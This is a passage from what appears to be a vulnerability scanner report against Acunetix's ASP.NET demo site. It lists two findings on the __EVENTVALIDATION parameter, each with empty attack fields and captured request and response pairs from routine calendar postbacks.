vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1095 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,095 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8394&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDAVfcK5toIZGRkS0f6n0ZSgvj2o6zxLrelUn9xIqA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKjutjcCgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWULwtCEZg8NSvKVgB3nkL4A0iiTw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:44:52 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgDAVfcK5toIZGRkS0f6n0ZSgvj2o6zxLrelUn9xIqA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKjutjcCgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWULwtCEZg8NSvKVgB3nkL4A0iiTw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:White" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8548&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBA83oOX9sIZGRkG0Gy25gvhjWrx961sZJiH4r03aM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKjweeODQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMFpLljTh9nx5SbVMQLT4uKHrND0Q%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:54:48 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBA83oOX9sIZGRkG0Gy25gvhjWrx961sZJiH4r03aM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKjweeODQK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMFpLljTh9nx5SbVMQLT4uKHrND0Q=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:White" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
